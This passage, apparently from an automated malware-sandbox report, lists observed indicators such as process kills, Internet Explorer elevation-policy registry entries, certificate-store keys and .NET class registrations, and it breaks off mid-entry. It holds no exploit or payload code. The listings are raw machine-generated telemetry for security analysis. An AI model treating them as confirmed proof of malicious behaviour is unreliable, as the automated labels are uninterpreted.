Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 2628 taskkill.exe 2336 taskkill.exe 2696 taskkill.exe -
Processes:
iexplore.exeIEXPLORE.EXEmshta.exemsiexec.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7} msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9} msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5BBFBC91-284A-11EC-8BB5-D613E35B5575} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "340471013" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a60000000002000000000010660000000100002000000083e575d713da71eae99a304b7419a78d9e8b53ec49d5022444fa44fa9e5cd29b000000000e8000000002000020000000a04deb6ff8e418c95ecce1a2e56230866dbee52293c8035efcce446281c02de520000000ad9ba3ede2d0e9b35274d080ffc781f4214fd0c851c9b9081f604d424351f1f4400000000a8cf97408ef9ce9338a8f50e1bfc33602f6d4a70312deb576a677386591849469044385d11a8cb520eb6a165251efb1f34ec08ece95fca996f266a6dae4962c iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\CLSID = "{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9} msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0a0103f57bcd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a6000000000200000000001066000000010000200000001e7ce8a948fb8c97f51e076f251c72c9d6dc67f65c10efb1c6399e31e6e4f845000000000e8000000002000020000000e77f0876b10df0bc623fd04501374a805e6fb7c3b0cdc68b2e9df58ed85020f790000000eae836c1cdbe5449556e57d09fabf3cfb75726d509ed4abd9efa224e3db2c69b1eab2d108764c47cfaf1b054e4a43d59f9adb23138b5cb83c4a5b3f3862c7aa4fae41508cd2c85c3535b195aed1b23ec46d9755ef1708e2c5ecd0e29f0174c25ade98e7b7c8149639e0401118da70b24f459e5cd6ac70e16947d021bca3df560de38750ff597ba48869d215f5c95d61a40000000eee7551abd9af214a848c833110d5f545a257c0ca7cce997b2d74491b35f64e45020ee0ee4247b151d456a5e29289b966d0df824cc8ac7e5d341a6f264c6795b iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\Policy = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9} msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\Policy = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\Policy = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\CLSID = "{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7} msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ja-JP = "ja-JP.1" iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemsiexec.exemscorsvw.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mscorsvw.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\6CF876C7\LanguageList = 6a0061002d004a00500000006a006100000065006e002d0055005300000065006e0000000000 mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mscorsvw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\6CF876C7\@%SystemRoot%\system32\dnsapi.dll,-103 = "ドメイン ネーム システム (DNS) サーバー信頼" mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs mscorsvw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\6CF876C7\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker ドライブ暗号化" mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs mscorsvw.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mscorsvw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication\Name = "mscorsvw.exe" mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mscorsvw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mscorsvw.exe -
Modifies registry class 64 IoCs
Processes:
msiexec.exeaspnet_regiis.exeaspnet_regiis.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Record\{B30FD15E-CED6-3977-8151-0D50E79CD703}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B38DA717-D61B-3C13-93CE-2B9370D0AE43}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2A7B042D-578A-4366-9A3D-154C0498458E}\InprocServer32\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB4020210 = "Servicing_Key" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{6BD98650-5AE6-3F03-B6CF-1463BBD45E6D}\4.0.0.0\Class = "System.Reflection.ExceptionHandlingClauseOptions" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{BA68FFCE-C94A-3A7B-ABB9-BE5259B66D1B}\4.0.0.0\Class = "System.EnterpriseServices.CompensatingResourceManager.LogRecordFlags" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20C6F4C2-80A8-4310-A59A-1CC487334236}\ProgID\ = "PenIMC4v2.PimcSurrogate2.4" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{7DE6016B-A2A2-33A7-875D-3F78DE18094A}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D533D4E5-8654-3F82-81DC-E751CB792593}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5437FDFA-9EC9-4CCC-8531-42F8D9C19AF7}\Implemented Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}\ msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{2173568C-6EDC-392B-880A-CC158D7E2BDA}\4.0.0.0\Class = "System.Resources.UltimateResourceFallbackLocation" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{4E8B1BB8-6A6F-3B57-8AFA-0129550B07BE}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{72B06367-DE53-3111-9C49-B816EFEE3148}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{7DE6016B-A2A2-33A7-875D-3F78DE18094A}\4.0.0.0\Class = "System.Diagnostics.SymbolStore.SymSearchPolicies" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{148540D3-E67F-36DC-A55D-2C8DEC53B9D3}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{51E1B3CA-D3CB-39BF-A016-6199569E74B2}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45FB4600-E6E8-4928-B25E-50476FF79425}\InprocServer32\ThreadingModel = "Both" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB2938782 = "Servicing_Key" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{56ABB41C-4516-30F6-882E-57F234AB5028}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E3DC8079-43BC-3E70-B291-1591CC9E451D}\4.0.0.0\Class = "System.Configuration.Assemblies.AssemblyVersionCompatibility" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{E6FBF496-6B15-3A23-A4D2-A2F7137C1216}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{F75B6772-91E4-4D2F-9D44-61A447109C2B}\DllSurrogate aspnet_regiis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A6CCEB32-EC73-3E9B-8852-02783C97D3FA}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{23D4A35B-C997-3401-8372-736025B17744}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{3613A9B6-C23B-3B54-AE02-6EC764D69E70}\4.0.0.0\RuntimeVersion = "v4.0.30319" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{688A6FF0-5727-32D2-8228-6E838A822616}\4.0.0.0 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{B42619B4-0EDC-3F55-AA64-2140275FA115}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{0EFE423A-A87E-33D9-8BF4-2D212620EE5F}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{D58DC4BB-3A4C-3B0C-B75F-9D0876694F3D}\4.0.0.0 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{20C6F4C2-80A8-4310-A59A-1CC487334236} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{049C5C49-BAF0-429C-8B8F-2CC11F5AA422}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{B3B46869-C190-3199-96DA-4006E2AC6E72}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB3095338 = "Servicing_Key" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{51191552-C65E-360D-BA21-9F0E454FD59F}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{3223E024-5D70-3236-A92A-6B4114B2632F}\4.0.0.0\Class = "System.Reflection.BindingFlags" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{6BE41CDF-29D7-32DB-8181-5117F580BA68}\4.0.0.0\Class = "System.Security.Cryptography.CspProviderFlags" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{5437FDFA-9EC9-4CCC-8531-42F8D9C19AF7}\InprocServer32\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\InprocServer32\RuntimeVersion = "v4.0.30319" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{11472518-C3B8-3BF4-9705-2135E1709883}\4.0.0.0 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{8636F9A3-3B92-38E6-95DC-0B965086AC44}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0015B4CC-EDC9-3A0E-B14A-AFB8F75F2A1C}\2.4\0\win32\ = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\System.Web.tlb" aspnet_regiis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{74CAA246-BE0E-3AE5-A17C-946E10D89626}\4.0.0.0\Class = "System.IO.FileAccess" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{4E8B1BB8-6A6F-3B57-8AFA-0129550B07BE}\4.0.0.0\Class = "System.Reflection.Emit.EventToken" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Record\{94942670-4ACF-3572-92D1-0916CD777E00}\4.0.0.0 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{9C5923E9-DE52-33EA-88DE-7EBC8633B9CC}\4.0.0.0\Class = "System.Guid" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D12ABE44-783E-328B-AAD3-4ED726E903C7}\4.0.0.0\Class = "System.MidpointRounding" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{38512CF6-FF94-3AD8-8299-F5F64A8956AA}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, 